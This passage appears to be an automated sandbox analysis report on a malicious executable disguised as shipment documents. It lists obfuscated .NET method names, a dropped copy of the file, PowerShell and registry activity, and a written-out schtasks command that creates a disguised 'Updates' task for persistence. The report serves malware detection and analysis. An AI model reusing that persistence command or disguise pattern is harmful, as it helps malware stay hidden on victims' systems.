                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, hdAVyr44GYdXRtyTuLG.csHigh entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, z0u6FmON9MQ6CyDB1o.csHigh entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, v2559Cskf3ytVZ5mSG.csHigh entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WuxZfQxTK70JGtybAX.csHigh entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, sfMpDDrgl5tIjHCJHi.csHigh entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, LGGmv9ymOKi5LCYbxd.csHigh entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, zXKTFwNZqwSqRHqKqL.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.csHigh entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, rrJmBaYMgAesC46HKX.csHigh entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, K5wdDCoyqRME3lH5EU.csHigh entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.csHigh entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, tUWY54atKrJQlDpHvp.csHigh entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, XVYEWIFWBiLsTMqJ21.csHigh entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, Bw42dh4UebWEaNMXNVH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, s8ssFsqinUuXVMjTPg.csHigh entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, syuYZq4btbLXi0a2KwI.csHigh entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, qsHtpHimvnffligSo0.csHigh entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ajBCZlS1bBb6GaZcdb.csHigh entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, nSJmboJMlQX1MjvRbF.csHigh entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, n1RHYrzOvkNoCypqxv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ej24U02jMkJFDYhhLB.csHigh entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, yMxGlJ7yHLI4VmhwgP.csHigh entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, EsoFSY1MObHNFvQ0yc.csHigh entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, hdAVyr44GYdXRtyTuLG.csHigh entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, z0u6FmON9MQ6CyDB1o.csHigh entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, v2559Cskf3ytVZ5mSG.csHigh entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WuxZfQxTK70JGtybAX.csHigh entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
